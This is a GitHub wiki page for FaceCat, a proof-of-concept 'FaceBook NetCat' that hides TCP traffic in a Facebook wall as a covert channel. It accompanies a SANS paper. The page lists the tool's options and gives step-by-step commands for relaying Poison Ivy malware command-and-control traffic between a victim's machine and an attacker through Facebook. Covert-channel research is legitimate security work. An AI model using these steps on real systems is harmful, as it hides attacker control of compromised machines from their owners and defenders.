Skip to content
This repository has been archived by the owner on Feb 10, 2023. It is now read-only.
Jose Selvi edited this page Aug 23, 2014 · 1 revision

FaceCat

FaceCat is a tool developed as a Proof of Concept regarding Covert Channels over Social Networks.

FaceCat is a FaceBook NetCat, and can be used to hide TCP traffic within a FaceBook Wall.

You can DOWNLOAD it or you can watch a couple of demos: TCP Chat, Poison Ivy.

WARNING! FaceCat is a PoC and it isn't updated in a regular basis, so if FaceBook changes it would be necesary to make some fixes in the code. If you update it for your own demos, please send a PULL REQUEST.

You can read more about FaceCat in my SANS GCIH Gold Paper.

$ ./facecat.py

Usage: facecat.py [options]

Options:

-h, --help show this help message and exit

-w WALL, --wall=WALL wall pipe account

-c HOST, --host=HOST connection host

-p PORT, --port=PORT listening or connection port

-v, --verbose verbose output

Usage Example:

1 - Create a Poison Ivy (or any other malware) sample. It should connect to 127.0.0.1:3460 as a C&C.

2 - Run a server mode facecat in the victim's machine. The FaceBook account user as a cover channel is [email protected]:

facecat.py –v –m [email protected] –p 3460

3 - Run the Poison Ivy C&C in the attacker's machine and then run a client mode facecat (it connects to the Poison Ivy C&C via TCP and to the server mode facecat via the covert channel):

facecat.py –v –m [email protected] –c 127.0.0.1 –p 3460

4 - Run the Poison Ivy sample in the victim's machine. It connects to the server mode facecat that relays the communications though the facebook covert channel. The client mode facecat connects to the C&C and complete the relay channel.

Clone this wiki locally